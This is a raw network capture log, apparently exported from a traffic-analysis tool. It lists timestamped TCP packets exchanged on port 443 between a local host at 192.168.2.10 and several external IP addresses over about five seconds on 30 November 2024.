                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.737240076 CET4434998723.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.901638985 CET4434998013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.904979944 CET4434998013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.905046940 CET4434998013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.905072927 CET49980443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.905117989 CET49980443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.905489922 CET49980443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.905517101 CET4434998013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.905525923 CET49980443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.905530930 CET4434998013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.908804893 CET49988443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.908844948 CET4434998813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.909017086 CET49988443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.909189939 CET49988443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:05.909203053 CET4434998813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:06.360651970 CET49989443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:06.360691071 CET4434998994.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:06.360790014 CET49989443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:06.361099005 CET49989443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:06.361114025 CET4434998994.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:06.710540056 CET4434998313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:06.711728096 CET49983443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:06.711746931 CET4434998313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:06.712413073 CET49983443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:06.712420940 CET4434998313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:06.765010118 CET4434998294.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:06.765088081 CET4434998294.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:06.765146971 CET49982443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:06.765182018 CET49982443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:06.766340017 CET49982443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:06.766355991 CET4434998294.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:06.955651999 CET4434998723.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:06.956012964 CET49987443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:06.956042051 CET4434998723.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:06.956387043 CET4434998723.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:06.956718922 CET49987443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:06.956835985 CET4434998723.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:06.956878901 CET49987443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:06.999020100 CET49987443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:06.999057055 CET4434998723.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.052066088 CET4434998413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.052834034 CET49984443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.052855968 CET4434998413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.053343058 CET49984443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.053348064 CET4434998413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.080780029 CET4434998613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.081363916 CET49986443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.081408978 CET4434998613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.082027912 CET49986443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.082035065 CET4434998613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.154113054 CET4434998313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.157890081 CET4434998313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.158133030 CET49983443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.158293009 CET49983443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.158293009 CET49983443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.158318043 CET4434998313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.158335924 CET4434998313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.162416935 CET49990443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.162461996 CET4434999013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.162815094 CET49990443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.163743973 CET49990443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.163769007 CET4434999013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.184159040 CET4434998513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.184814930 CET49985443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.184838057 CET4434998513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.185426950 CET49985443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.185431957 CET4434998513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.397439957 CET49991443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.397488117 CET4434999194.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.397561073 CET49991443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.398391008 CET49991443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.398406982 CET4434999194.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.399749041 CET4434998723.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.399775982 CET4434998723.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.399780989 CET4434998723.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.399854898 CET4434998723.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.399868011 CET49987443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.399912119 CET49987443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.402204990 CET49987443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.402214050 CET4434998723.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.410675049 CET49992443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.410723925 CET4434999223.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.410787106 CET49992443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.411557913 CET49992443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.411571026 CET4434999223.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.486046076 CET4434998413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.490123987 CET4434998413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.490183115 CET4434998413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.490211964 CET49984443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.490274906 CET49984443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.490395069 CET49984443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.490412951 CET4434998413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.490425110 CET49984443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.490432024 CET4434998413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.505100012 CET49993443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.505150080 CET4434999313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.505254984 CET49993443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.505872011 CET49993443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.505887032 CET4434999313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.515467882 CET4434998613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.518605947 CET4434998613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.518651962 CET4434998613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.518754959 CET49986443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.518886089 CET49986443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.520190954 CET49986443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.520190954 CET49986443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.520200968 CET4434998613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.520209074 CET4434998613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.527056932 CET49994443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.527098894 CET4434999413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.527188063 CET49994443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.527586937 CET49994443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.527607918 CET4434999413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.637912035 CET4434998513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.641609907 CET4434998513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.643481970 CET49985443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.646522045 CET49985443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.646539927 CET4434998513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.646642923 CET49985443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.646648884 CET4434998513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.691855907 CET4434998813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.695894003 CET49995443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.695931911 CET4434999513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.696041107 CET49995443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.738487005 CET49988443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.809221983 CET49988443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.809240103 CET4434998813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.809789896 CET49988443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.809794903 CET4434998813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.850342035 CET4434998994.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.850491047 CET49989443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.862833977 CET49995443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.862865925 CET4434999513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.883678913 CET49989443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.883702040 CET4434998994.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.908102989 CET49989443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.908127069 CET4434998994.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.908153057 CET49989443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:07.908160925 CET4434998994.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.137809038 CET4434998813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.140927076 CET4434998813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.141043901 CET49988443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.141083002 CET49988443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.141083002 CET49988443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.141098976 CET4434998813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.141109943 CET4434998813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.144851923 CET49996443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.144869089 CET4434999613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.144953966 CET49996443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.145112991 CET49996443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.145126104 CET4434999613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.670744896 CET4434999223.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.671103001 CET49992443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.671113014 CET4434999223.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.671605110 CET4434999223.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.671989918 CET49992443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.672099113 CET4434999223.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.672116041 CET49992443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.717572927 CET49992443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.717583895 CET4434999223.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.802753925 CET44349904104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.802828074 CET44349904104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.802930117 CET49904443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.844587088 CET4434999194.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.844724894 CET49991443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.845355988 CET49991443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.845371962 CET4434999194.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.847248077 CET49991443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.847266912 CET4434999194.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.894882917 CET4434998994.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.894958973 CET4434998994.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.894990921 CET49989443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.895078897 CET49989443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.895960093 CET49989443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.895979881 CET4434998994.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.923388958 CET4434999013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.931469917 CET49990443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.931490898 CET4434999013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.932173967 CET49990443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:08.932178974 CET4434999013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.080672026 CET44349905104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.080760956 CET44349905104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.080969095 CET49905443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.123837948 CET4434999223.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.123867035 CET4434999223.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.123876095 CET4434999223.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.123959064 CET4434999223.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.123965025 CET49992443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.124036074 CET49992443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.125351906 CET49992443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.125365973 CET4434999223.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.131135941 CET49904443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.131160975 CET44349904104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.131181002 CET49905443192.168.2.10104.70.121.51
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.131197929 CET44349905104.70.121.51192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.131573915 CET49997443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.131598949 CET4434999723.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.131675959 CET49997443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.131879091 CET49997443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.131890059 CET4434999723.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.241106033 CET4434999313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.243484020 CET49993443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.243510008 CET4434999313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.243971109 CET49993443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.243978024 CET4434999313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.358721018 CET4434999013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.361860037 CET4434999013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.361927986 CET4434999013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.362001896 CET49990443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.362001896 CET49990443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.362066031 CET49990443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.362066031 CET49990443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.362083912 CET4434999013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.362093925 CET4434999013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.365359068 CET49998443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.365411997 CET4434999813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.365483999 CET49998443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.365634918 CET49998443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.365653038 CET4434999813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.392925024 CET4434999413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.393606901 CET49994443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.393642902 CET4434999413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.394130945 CET49994443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.394135952 CET4434999413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.578018904 CET4434999513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.578747988 CET49995443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.578777075 CET4434999513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.579269886 CET49995443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.579274893 CET4434999513.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.675560951 CET4434999313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.679270983 CET4434999313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.681055069 CET49993443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.681090117 CET49993443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.681108952 CET4434999313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.681118965 CET49993443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.681123972 CET4434999313.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.684201002 CET49999443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.684251070 CET4434999913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.684343100 CET49999443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.684503078 CET49999443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.684514999 CET4434999913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.733278990 CET4434999194.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.733357906 CET4434999194.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.733412027 CET49991443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.733438015 CET49991443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.734843016 CET49991443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.734863043 CET4434999194.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.846051931 CET4434999413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.849880934 CET4434999413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.849941015 CET4434999413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.849948883 CET49994443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.849997044 CET49994443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.850068092 CET49994443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.850090027 CET4434999413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.850105047 CET49994443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.850111008 CET4434999413.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.853334904 CET50000443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.853374958 CET4435000013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.853446960 CET50000443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.853641033 CET50000443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.853653908 CET4435000013.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.949014902 CET4434999613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.949657917 CET49996443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.949676037 CET4434999613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.950182915 CET49996443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:09.950186968 CET4434999613.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:39:10.014235973 CET4434999513.107.246.63192.168.2.10
